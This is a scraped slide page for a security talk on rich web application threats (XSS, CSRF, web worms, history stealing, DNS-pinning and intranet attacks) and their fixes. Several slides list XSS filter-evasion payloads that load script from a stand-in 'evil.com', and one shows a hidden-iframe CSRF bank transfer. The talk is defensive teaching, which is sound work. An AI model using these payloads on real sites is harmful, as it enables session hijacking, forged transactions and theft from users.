[Webinar] SpiraTest - Setting New Standards in Quality Assurance[Webinar] SpiraTest - Setting New Standards in Quality Assurance
[Webinar] SpiraTest - Setting New Standards in Quality AssuranceInflectra
 
Developer Data Modeling Mistakes: From Postgres to NoSQL
Developer Data Modeling Mistakes: From Postgres to NoSQLDeveloper Data Modeling Mistakes: From Postgres to NoSQL
Developer Data Modeling Mistakes: From Postgres to NoSQLScyllaDB
 
WordPress Websites for Engineers: Elevate Your Brand
WordPress Websites for Engineers: Elevate Your BrandWordPress Websites for Engineers: Elevate Your Brand
WordPress Websites for Engineers: Elevate Your Brandgvaughan
 
TrustArc Webinar - How to Build Consumer Trust Through Data Privacy
TrustArc Webinar - How to Build Consumer Trust Through Data PrivacyTrustArc Webinar - How to Build Consumer Trust Through Data Privacy
TrustArc Webinar - How to Build Consumer Trust Through Data PrivacyTrustArc
 
Passkey Providers and Enabling Portability: FIDO Paris Seminar.pptx
Passkey Providers and Enabling Portability: FIDO Paris Seminar.pptxPasskey Providers and Enabling Portability: FIDO Paris Seminar.pptx
Passkey Providers and Enabling Portability: FIDO Paris Seminar.pptxLoriGlavin3
 
Gen AI in Business - Global Trends Report 2024.pdf
Gen AI in Business - Global Trends Report 2024.pdfGen AI in Business - Global Trends Report 2024.pdf
Gen AI in Business - Global Trends Report 2024.pdfAddepto
 

Recently uploaded (20)

Tampa BSides - Chef's Tour of Microsoft Security Adoption Framework (SAF)
Tampa BSides - Chef's Tour of Microsoft Security Adoption Framework (SAF)Tampa BSides - Chef's Tour of Microsoft Security Adoption Framework (SAF)
Tampa BSides - Chef's Tour of Microsoft Security Adoption Framework (SAF)
 
DSPy a system for AI to Write Prompts and Do Fine Tuning
DSPy a system for AI to Write Prompts and Do Fine TuningDSPy a system for AI to Write Prompts and Do Fine Tuning
DSPy a system for AI to Write Prompts and Do Fine Tuning
 
How AI, OpenAI, and ChatGPT impact business and software.
How AI, OpenAI, and ChatGPT impact business and software.How AI, OpenAI, and ChatGPT impact business and software.
How AI, OpenAI, and ChatGPT impact business and software.
 
New from BookNet Canada for 2024: BNC CataList - Tech Forum 2024
New from BookNet Canada for 2024: BNC CataList - Tech Forum 2024New from BookNet Canada for 2024: BNC CataList - Tech Forum 2024
New from BookNet Canada for 2024: BNC CataList - Tech Forum 2024
 
Scale your database traffic with Read & Write split using MySQL Router
Scale your database traffic with Read & Write split using MySQL RouterScale your database traffic with Read & Write split using MySQL Router
Scale your database traffic with Read & Write split using MySQL Router
 
A Journey Into the Emotions of Software Developers
A Journey Into the Emotions of Software DevelopersA Journey Into the Emotions of Software Developers
A Journey Into the Emotions of Software Developers
 
Moving Beyond Passwords: FIDO Paris Seminar.pdf
Moving Beyond Passwords: FIDO Paris Seminar.pdfMoving Beyond Passwords: FIDO Paris Seminar.pdf
Moving Beyond Passwords: FIDO Paris Seminar.pdf
 
Modern Roaming for Notes and Nomad – Cheaper Faster Better Stronger
Modern Roaming for Notes and Nomad – Cheaper Faster Better StrongerModern Roaming for Notes and Nomad – Cheaper Faster Better Stronger
Modern Roaming for Notes and Nomad – Cheaper Faster Better Stronger
 
SIP trunking in Janus @ Kamailio World 2024
SIP trunking in Janus @ Kamailio World 2024SIP trunking in Janus @ Kamailio World 2024
SIP trunking in Janus @ Kamailio World 2024
 
Use of FIDO in the Payments and Identity Landscape: FIDO Paris Seminar.pptx
Use of FIDO in the Payments and Identity Landscape: FIDO Paris Seminar.pptxUse of FIDO in the Payments and Identity Landscape: FIDO Paris Seminar.pptx
Use of FIDO in the Payments and Identity Landscape: FIDO Paris Seminar.pptx
 
Visualising and forecasting stocks using Dash
Visualising and forecasting stocks using DashVisualising and forecasting stocks using Dash
Visualising and forecasting stocks using Dash
 
Take control of your SAP testing with UiPath Test Suite
Take control of your SAP testing with UiPath Test SuiteTake control of your SAP testing with UiPath Test Suite
Take control of your SAP testing with UiPath Test Suite
 
A Deep Dive on Passkeys: FIDO Paris Seminar.pptx
A Deep Dive on Passkeys: FIDO Paris Seminar.pptxA Deep Dive on Passkeys: FIDO Paris Seminar.pptx
A Deep Dive on Passkeys: FIDO Paris Seminar.pptx
 
DevoxxFR 2024 Reproducible Builds with Apache Maven
DevoxxFR 2024 Reproducible Builds with Apache MavenDevoxxFR 2024 Reproducible Builds with Apache Maven
DevoxxFR 2024 Reproducible Builds with Apache Maven
 
[Webinar] SpiraTest - Setting New Standards in Quality Assurance
[Webinar] SpiraTest - Setting New Standards in Quality Assurance[Webinar] SpiraTest - Setting New Standards in Quality Assurance
[Webinar] SpiraTest - Setting New Standards in Quality Assurance
 
Developer Data Modeling Mistakes: From Postgres to NoSQL
Developer Data Modeling Mistakes: From Postgres to NoSQLDeveloper Data Modeling Mistakes: From Postgres to NoSQL
Developer Data Modeling Mistakes: From Postgres to NoSQL
 
WordPress Websites for Engineers: Elevate Your Brand
WordPress Websites for Engineers: Elevate Your BrandWordPress Websites for Engineers: Elevate Your Brand
WordPress Websites for Engineers: Elevate Your Brand
 
TrustArc Webinar - How to Build Consumer Trust Through Data Privacy
TrustArc Webinar - How to Build Consumer Trust Through Data PrivacyTrustArc Webinar - How to Build Consumer Trust Through Data Privacy
TrustArc Webinar - How to Build Consumer Trust Through Data Privacy
 
Passkey Providers and Enabling Portability: FIDO Paris Seminar.pptx
Passkey Providers and Enabling Portability: FIDO Paris Seminar.pptxPasskey Providers and Enabling Portability: FIDO Paris Seminar.pptx
Passkey Providers and Enabling Portability: FIDO Paris Seminar.pptx
 
Gen AI in Business - Global Trends Report 2024.pdf
Gen AI in Business - Global Trends Report 2024.pdfGen AI in Business - Global Trends Report 2024.pdf
Gen AI in Business - Global Trends Report 2024.pdf
 

Rich Web App Security - Keeping your application safe

  • 1. Rich Web App Security Keeping your application safe Jeremiah Grossman Joe Walker Founder and CTO DWR Developer WhiteHat Security Getahead 1
  • 2. 5 Stages of Web Application Security Grief Denial Anger Bargaining Depression Acceptance 2
  • 3. Network security solutions don't work for web application security Telnet FTP POP App Servers http(s) Web Servers Database 3
  • 4. 8 out of 10 Websites are Vulnerable 4
  • 5. The Victims The companies that host the Applications The users that use the Applications 5
  • 6. Building Blocks: XSS XSS = Cross Site Scripting You are at risk of an XSS attack any time you allow scripts from someone untrusted into pages from your domain 6
  • 7. Building Blocks: XSS You let the user enter their name Someone is going to enter their name like this: Joe<script src="evil.com/danger.js"> Then, whoever looks at Joe’s name will execute Joe’s script and become a slave of Joe 7
  • 8. Making User Input Safe You filter out ‘<script.*>’ and then you’re safe. Right? 8
  • 9. Making User Input Safe Actually you also need to filter: <a href='javascript:danger();'> <body onload='danger();'> <p style='background-image: url("javascript:danger();")'); <img src='javascript:danger()'/> 9
  • 10. Making User Input Safe And don’t forget: <body background="javascript:danger()"> <link rel="stylesheet" href="javascript:danger()"/> <style>@import evil.com/danger.js</style> <input type='image' src='javascript:danger()'/> 10
  • 11. Making User Input Safe And then there’s: <iframe src='evil.com/danger.html'/> <meta http-equiv="refresh" content="0;url=javascript:danger()"> <base href="javascript:danger()"> <frameset> <frame src="javascript:danger()">... 11
  • 12. Making User Input Safe But remember: <table background="javascript:danger()"> <tr background="javascript:danger()"> <div style="width:expression(danger();)"> <object type="text/x-scriptlet" data="evil.com/danger.js"> 12
  • 13. 5 Stages of Web Application Security Grief Denial Anger Bargaining Depression Acceptance 13
  • 14. Making User Input Safe It’s made 1000 times worse by browsers being able to make sense of virtually anything. This: <a href="a.html" link</a> makes perfect sense to a browser. 14
  • 15. Making User Input Safe It’s made 1000 times worse by browsers being able to make sense of virtually anything. This: <a href="a.html">link makes perfect sense to a browser. 15
  • 16. Making User Input Safe It’s made 1000 times worse by browsers being able to make sense of virtually anything. This: <a href="a.html >link</a> makes perfect sense to a browser. 16
  • 17. Making User Input Safe It’s made 1000 times worse by browsers being able to make sense of virtually anything. This: (depending on some encoding tricks) ¼a href="a.html"¾link¼/a¾ makes perfect sense to a browser. 17
  • 18. Making User Input Safe And we haven’t got into: • Flash (ActionScript ~= JavaScript) • SVG (can embed JavaScript) • .htc (packaged HTML in IE) • XML Data Islands (IE only) • HTML+TIME You can use both <object> and <embed> for many of these 18
  • 19. 5 Stages of Web Application Security Grief Denial Anger Bargaining Depression Acceptance 19
  • 20. Building Blocks: CSRF CSRF = Cross Site Request Forgery You are at risk of a CSRF attack whenever you assume that a request containing an authentication header (e.g. cookies) is something the user intended 20
  • 21. Building Blocks: CSRF bank.com evil.com . Welcome Fred, Thank-you for logging in <iframe width=0 height=0 src="http://bank.com/transfer.cgi?amnt=all&dest=MrEvil"/> 21
  • 22. Building Blocks: CSRF JavaScript is not always required to exploit a CSRF hole Often all you need is: <iframe src="dangerous_url"> or <img src="dangerous_url"/> or <script src="dangerous_url"> You can’t use XHR because cross-domain rules prevent the request from being sent 22
  • 23. Attacks only get more Effective 70 new new attack techniques in 2006 Many are small, but they combine in worrying ways Jeremiah’s Top 10: http://jeremiahgrossman.blogspot.com/2006/12/ top-10-web-hacks-of-2006.html The 6 most important ... 23
  • 24. 6. Hacking RSS Readers } ⇢ Aggregators generally Users get RSS Feeds change the domain the result Hacking RSS and Atom Feed Implementations http://www.cgisecurity.com/papers/HackingFeeds.pdf 24
  • 25. 5. Web Worms If your site that isn’t 100% safe against XSS and CSRF, users can attack their ‘friends’ with scripts XHR/Flash/Quicktime can be used as a vector Web worms grow much faster than email worms So far, infections have been mostly benign, like how email worms were in the early 90’s ... http://www.whitehatsec.com/downloads/WHXSSThreats.pdf 25
  • 26. 4. Backdooring Media Files Many media types are scriptable by design: Some are ‘scriptable’ by buffer-overflow: If you are allowing users to upload files, be afraid. JavaScript Malware embedded in everything http://jeremiahgrossman.blogspot.com/2006/09/javascript-malware-embedded-in.html 26
  • 27. 3. History Stealing - Part 1 I want to know if you visit dodgy.com I create a page with a link and use a script to read the CSS link color: purple:guilty, blue:not guilty A page can quickly check thousands of sites http://ha.ckers.org/weird/CSS-history-hack.html 27
  • 28. 3. History Stealing - Part 2 Point a script tag at a protected HTML resource, detect differing replies by differing error messages <script src="http://mail.google.com/mail"> http://ha.ckers.org/weird/javascript-website-login-checker.html 28
  • 29. 2. Anti-DNS Pinning The basic attack: A browser visits evil.com. The DNS lookup gives the real web- server address. 1 second later evil.com creates an iframe to the evil.com and drops the HTTP request The DNS pin is dropped, the browser needs to look up DNS again. This time it gets someone else’s address. The browser reads from the other site, but thinks it is the same domain. 29
  • 30. 2. Anti-DNS Pinning As it is the attack isn’t very useful because: • The browser thinks the domain is evil.com, so cookies for innocent.com are not sent, cookie protected resources are safe (for now) • But it’s great for Intranet hacking - no cookies are needed to read from 192.168.0.1 or 127.0.0.1 30
  • 31. 1. Intranet Hacking History stealing to enumerate hosts inside the firewall Anti-DNS pinning to read HTML from inside Many routers / firewalls / etc have default passwords, which an attacker can exploit Use CSRF to alter router / firewall settings http://www.whitehatsec.com/home/resources/presentations/files/javascript_malware.pdf 31
  • 32. 5 Stages of Web Application Security Grief Denial Anger Bargaining Depression Acceptance 32
  • 33. Fixing XSS (when HTML is Illegal) 1. Filter inputs by white-listing input characters Remember to filter header names and values 2. Filter outputs for the display environment For HTML: & &amp; < &lt; > &gt; ' &apos; " &quot; Other environments have other special chars 33
  • 34. Fixing XSS (when HTML is Legal, and Well Formed) 1. Filter inputs as before 2. Swap characters for entities (as before) 3. Swap back whitelist of allowed tags. e.g.: &lt;strong&gt; <strong> 4. Take extra care over attributes: s/&lta href=&quot;([^&]*)&quot;/&gt;/<a href="$1"/> 5. Don’t use regular expressions 34
  • 35. Fixing XSS (when HTML is Legal, and NOT Well Formed) 1. Find another way to do it / Swap jobs / Find some other solution to the problem 2. Create a tag soup parser to create a DOM tree from a badly formed HTML document Remember to recursively check encodings 3. Create a tree walker that removes all non approved elements and attributes 35
  • 36. Fixing CSRF Force users to log off Checking referrer headers doesn’t make things safe, but it does slow attackers down Include authentication tokens in the body OWASP servlet filter Double-submit cookie pattern Security Corner: Cross-Site Request Forgeries http://shiflett.org/articles/cross-site-request-forgeries 36
  • 37. 5 Stages of Web Application Security Grief Denial Anger Bargaining Depression Acceptance 37
  • 38. Questions? Joe Walker Jeremiah Grossman http://getahead.org/blog/joe http://www.whitehatsec.com/ 38